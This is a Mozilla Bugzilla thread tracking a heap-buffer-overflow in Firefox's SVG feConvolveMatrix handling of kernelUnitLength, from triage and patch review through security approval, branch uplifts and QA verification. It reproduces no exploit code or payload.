Bug 1329849 is the other bug that sounds similar. ("In SVG filter lighting code, bail out if kernelUnitLength is negative or zero.")
|
||
Updated•9 months ago
|
||
status-firefox52: --- → ?
status-firefox53: --- → ?
status-firefox54: --- → ?
status-firefox55: --- → affected
tracking-firefox55: --- → +
|
|
||
Comment 5•9 months ago
|
||
Vincent, could you see if this is a dupe of bug 1329849 or not? Thanks.
Flags: needinfo?(vliu)
|
||
Comment 6•9 months ago
|
||
(In reply to Al Billings [:abillings] from comment #3) > Ivan, we think this might be a known (fixed) issue. [...] can you try this with a > current taskcluster made ASAN build. > [...] > 2. On the right side, you will see the most recent build (the browser is > in "public/build/target.tar.bz2"). I just tried this with Ivan's test code, and I got an ASAN issue: === ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fac833dc336 at pc 0x7fac98bab18e bp 0x7fff2037de70 sp 0x7fff2037de68 READ of size 1 at 0x7fac833dc336 thread T0 (Web Content) === So I don't think this is an already-fixed issue. Additionally, the testcase triggers an abort in a normal debug build (no ASAN instrumentation), with this fatal assertion: Assertion failure: GetOutputRectInRect(aRect).Contains(aRect), at gfx/2d/FilterNodeSoftware.cpp:619 (I suspect that means the answer to comment 5 is "no".)
Flags: needinfo?(ifratric)
|
|
||
Comment 7•9 months ago
|
||
Created attachment 8848159 [details]
testcase 1 (from reporter)
|
(Reporter) | |
Comment 8•9 months ago
|
||
Hi, I used a build from https://developer.mozilla.org/en-US/docs/Mozilla/Testing/Firefox_and_Address_Sanitizer (I also have my own build but that one is slighly out-of-date) However, I just tried with a build Al likned in Comment 3 and the bug still reproduces from me. I'm going to attach my PoC in case there is some issue with copy-pasting the PoC code.
|
|
(Reporter) | |
Comment 9•9 months ago
|
||
Ah, Daniel beat me to it (Thanks! :-)
|
|
||
Comment 10•9 months ago
|
||
Sorry for our confusion, Ivan. Vincent, maybe you could look into fixing this, then? Thanks.
|
|
||
Updated•9 months ago
|
||
Group: core-security → gfx-core-security
|
(Assignee) | |
Comment 11•9 months ago
|
||
(In reply to Andrew McCreight [:mccr8] from comment #5) > Vincent, could you see if this is a dupe of bug 1329849 or not? Thanks. From back trace information, I also don't think it is about to Bug 1329849. The attached test case also Assertion failure on mac but different crash stack. I will have ASAN build to see if I can see the same crash stack.
|
|
(Assignee) | |
Updated•9 months ago
|
||
Flags: needinfo?(vliu)
|
|
||
Comment 12•9 months ago
|
||
Thanks for taking a look, Vincent! I'll tentatively assign this to you, then.
Assignee: nobody → vliu
Status: NEW → ASSIGNED
|
|
(Assignee) | |
Comment 13•9 months ago
|
||
Created attachment 8849476 [details] [diff] [review] 0001-Bug-1347617-In-SVG-ConvolveMatrix-code-bail-out-if-k.patch Hi Daniel, It seems that Gecko hits similar crash in bug 1329849 but for attribute in ConvolveMatrix. Also, the spec also said it shouldn't be a negative or zero value. Please see [1] for detail. Based on this, could you please help me to review the patch? Thanks. [1]: https://www.w3.org/TR/SVG/filters.html#feConvolveMatrixElementKernelUnitLengthAttribute I will also attach crash test to review in the following comment.
Attachment #8849476 -
Flags: review?(dholbert)
|
|
(Assignee) | |
Comment 14•9 months ago
|
||
Created attachment 8849477 [details] [diff] [review] 0002-Bug-1347617-Add-crash-tests.-r-dholbert.patch [Do not land until bug is public] Add crash test for review.
Attachment #8849477 -
Flags: review?(dholbert)
|
|
(Assignee) | |
Updated•9 months ago
|
||
Flags: needinfo?(milan)
|
|
||
Comment 15•9 months ago
|
||
Comment on attachment 8849476 [details] [diff] [review] 0001-Bug-1347617-In-SVG-ConvolveMatrix-code-bail-out-if-k.patch r=me Remember to request sec-approval before landing. Thanks!
Attachment #8849476 -
Flags: review?(dholbert) → review+
|
|
||
Comment 16•9 months ago
|
||
Comment on attachment 8849477 [details] [diff] [review] 0002-Bug-1347617-Add-crash-tests.-r-dholbert.patch [Do not land until bug is public] The crashtests look good, though of course we shouldn't land (publish) them until the bug is ready to be made public (after we've shipped the fix on all supported branches).
Attachment #8849477 -
Attachment description: 0002-Bug-1347617-Add-crash-tests.-r-dholbert.patch → 0002-Bug-1347617-Add-crash-tests.-r-dholbert.patch [Do not land until bug is public]
Attachment #8849477 -
Flags: review?(dholbert) → review+
|
|
(Assignee) | |
Comment 17•9 months ago
|
||
Comment on attachment 8849476 [details] [diff] [review] 0001-Bug-1347617-In-SVG-ConvolveMatrix-code-bail-out-if-k.patch [Security approval request comment] How easily could an exploit be constructed based on the patch? It is easily by using KernelUnitLength in ConvolveMatrix in SVG. Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem? Add comment in the patch and test also included. Which older supported branches are affected by this flaw? all If not all supported branches, which bug introduced the flaw? Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be? How likely is this patch to cause regressions; No how much testing does it need? crash test is enough
Attachment #8849476 -
Flags: sec-approval?
|
|
||
Comment 18•9 months ago
|
||
(In reply to Vincent Liu[:vliu] from comment #17) > Do you have backports for the affected branches? If not, how different, hard > to create, and risky will they be? How hard will it be to backport this to branches?
|
|
(Assignee) | |
Comment 19•9 months ago
|
||
(In reply to Al Billings [:abillings] from comment #18) > (In reply to Vincent Liu[:vliu] from comment #17) > > > Do you have backports for the affected branches? If not, how different, hard > > to create, and risky will they be? > > How hard will it be to backport this to branches? It is easy to backport this to branches.
|
|
||
Comment 20•9 months ago
|
||
sec-approval+ for trunk. We'll want backports for branches made and nominated. Does this affect ESR52 and ESR45?
status-firefox52: ? → wontfix
status-firefox53: ? → affected
status-firefox54: ? → affected
status-firefox-esr45: --- → ?
status-firefox-esr52: --- → ?
tracking-firefox53: --- → +
tracking-firefox54: --- → +
|
|
||
Updated•9 months ago
|
||
Attachment #8849476 -
Flags: sec-approval? → sec-approval+
|
|
(Assignee) | |
Comment 21•9 months ago
|
||
(In reply to Al Billings [:abillings] from comment #20) > sec-approval+ for trunk. > We'll want backports for branches made and nominated. > Does this affect ESR52 and ESR45? Yes, It also affect ESR52 and ESR45.
|
||
Updated•9 months ago
|
||
status-firefox-esr45: ? → affected
status-firefox-esr52: ? → affected
tracking-firefox-esr45: --- → ?
tracking-firefox-esr52: --- → ?
|
|
||
Comment 22•9 months ago
|
||
We'll definitely need ESR52 and ESR45 patches as well then unless there is a good reason not to fix this there.
tracking-firefox-esr45: ? → 53+
tracking-firefox-esr52: ? → 53+
|
|
||
Comment 23•8 months ago
|
||
(In reply to Al Billings [:abillings] from comment #20) > sec-approval+ for trunk. > We'll want backports for branches made and nominated. > Does this affect ESR52 and ESR45? Is this going to be checked in soon? It looks like this is going to miss the Firefox 53 (beta) release and associated ESR branches at this point.
Flags: needinfo?(vliu)
|
||
Updated•8 months ago
|
||
Flags: needinfo?(howareyou322)
|
|
(Assignee) | |
Comment 24•8 months ago
|
||
Comment on attachment 8849476 [details] [diff] [review] 0001-Bug-1347617-In-SVG-ConvolveMatrix-code-bail-out-if-k.patch [Approval Request Comment] If this is not a sec:{high,crit} bug, please state case for ESR consideration: User impact if declined: crash happens Fix Landed on Version: Risk to taking this patch (and alternatives if risky): No risk String or UUID changes made by this patch: NO See https://wiki.mozilla.org/Release_Management/ESR_Landing_Process for more info. [Approval Request Comment] If this is not a sec:{high,crit} bug, please state case for ESR consideration: User impact if declined: Crash Fix Landed on Version: Risk to taking this patch (and alternatives if risky): No String or UUID changes made by this patch: No See https://wiki.mozilla.org/Release_Management/ESR_Landing_Process for more info. Approval Request Comment [Feature/Bug causing the regression]: [User impact if declined]: Crash [Is this code covered by automated tests?]: No [Has the fix been verified in Nightly?]: Yes [Needs manual test from QE? If yes, steps to reproduce]: Run attached testcase [List of other uplifts needed for the feature/fix]: [Is the change risky?]: No [Why is the change risky/not risky?]: [String changes made/needed]: No
Flags: needinfo?(vliu)
Attachment #8849476 -
Flags: approval-mozilla-esr52?
Attachment #8849476 -
Flags: approval-mozilla-esr45?
Attachment #8849476 -
Flags: approval-mozilla-beta?
Attachment #8849476 -
Flags: approval-mozilla-aurora?
|
|
||
Comment 25•8 months ago
|
||
Wes or Ryan, can you help out here and land this on m-c first ? I usually try not to approve uplifts until they look ok on trunk.
Flags: needinfo?(wkocher)
Flags: needinfo?(ryanvm)
|
|
||
Comment 26•8 months ago
|
||
https://hg.mozilla.org/integration/mozilla-inbound/rev/a4713274a611ee111c60fc12580add019e49d235
Flags: needinfo?(wkocher)
Flags: needinfo?(ryanvm)
Flags: needinfo?(howareyou322)
Flags: in-testsuite?
|
|
||
Comment 27•8 months ago
|
||
Comment on attachment 8849476 [details] [diff] [review] 0001-Bug-1347617-In-SVG-ConvolveMatrix-code-bail-out-if-k.patch Seems to have landed ok on m-c, let's uplift to other branches. This will miss beta 10 but should land before the RC build on Monday.
Attachment #8849476 -
Flags: approval-mozilla-beta?
Attachment #8849476 -
Flags: approval-mozilla-beta+
Attachment #8849476 -
Flags: approval-mozilla-aurora?
Attachment #8849476 -
Flags: approval-mozilla-aurora+
|
|
||
Comment 28•8 months ago
|
||
| uplift | ||
https://hg.mozilla.org/releases/mozilla-aurora/rev/8ddc4fb22781 https://hg.mozilla.org/releases/mozilla-beta/rev/3972c6e42982
status-firefox53: affected → fixed
status-firefox54: affected → fixed
|
|
||
Comment 29•8 months ago
|
||
https://hg.mozilla.org/mozilla-central/rev/a4713274a611
Status: ASSIGNED → RESOLVED
Last Resolved: 8 months ago
status-firefox55: affected → fixed
Resolution: --- → FIXED
Target Milestone: --- → mozilla55
|
||
Comment 30•8 months ago
|
||
Comment on attachment 8849476 [details] [diff] [review] 0001-Bug-1347617-In-SVG-ConvolveMatrix-code-bail-out-if-k.patch sec-high, for 45.9 and 52.1 esr
Attachment #8849476 -
Flags: approval-mozilla-esr52?
Attachment #8849476 -
Flags: approval-mozilla-esr52+
Attachment #8849476 -
Flags: approval-mozilla-esr45?
Attachment #8849476 -
Flags: approval-mozilla-esr45+
|
|
||
Updated•8 months ago
|
||
Group: gfx-core-security → core-security-release
|
|
||
Comment 31•8 months ago
|
||
| uplift | ||
https://hg.mozilla.org/releases/mozilla-esr52/rev/2b95de78a92c https://hg.mozilla.org/releases/mozilla-esr45/rev/e40b00161221
status-firefox-esr45: affected → fixed
status-firefox-esr52: affected → fixed
|
||
Updated•8 months ago
|
||
Flags: qe-verify+
Whiteboard: [Disclosure deadline: June 15] → [Disclosure deadline: June 15][post-critsmash-triage]
|
|
||
Updated•8 months ago
|
||
Alias: CVE-2017-5465
Whiteboard: [Disclosure deadline: June 15][post-critsmash-triage] → [Disclosure deadline: June 15][post-critsmash-triage][adv-main53+][adv-esr52.1+][adv-esr45.9+]
|
||
Comment 32•8 months ago
|
||
Reproduced the initial issue on 51.0a1 (20160809064620) linux64-asan build, using Ubuntu 16.04 x64 and Ivan's testcase. I can confirm the fix for 55.0a1 (20170420072831), 54.0b1 (20170420081804), 53.0.1 (20170419192241), 52.1.1 (20170420003254) and 45.9.1 (20170419101820) latest linux64-asan-debug builds.
Status: RESOLVED → VERIFIED
status-firefox53: fixed → verified
status-firefox54: fixed → verified
status-firefox55: fixed → verified
status-firefox-esr45: fixed → verified
status-firefox-esr52: fixed → verified
Flags: qe-verify+
|
|
||
Updated•7 months ago
|
||
|
|
||
Updated•7 months ago
|
||
Group: core-security-release
Keywords: testcase
|
||
Comment 33•3 months ago
|
||
Vincent, can the test cases for this bug land now? Thanks!
Flags: needinfo?(vliu)
|
|
(Assignee) | |
Comment 34•3 months ago
|
||
(In reply to :Ehsan Akhgari (needinfo please, extremely long backlog) from comment #33) > Vincent, can the test cases for this bug land now? Thanks! yes after there is not crash happens on the try result.
|
|
(Assignee) | |
Comment 35•3 months ago
|
||
try: https://treeherder.mozilla.org/#/jobs?repo=try&revision=ed0ab401a1712d226451176fcd0c937885293aae&selectedJob=133022202
Flags: needinfo?(vliu)
|
||
Comment 36•3 months ago
|
||
Pushed by vliu@mozilla.com: https://hg.mozilla.org/integration/mozilla-inbound/rev/37b47aeb978f Add crash tests. r=dholbert
|
||
Comment 37•3 months ago
|
||
| bugherder | ||
https://hg.mozilla.org/mozilla-central/rev/37b47aeb978f
You need to log in
before you can comment on or make changes to this bug.
Description
•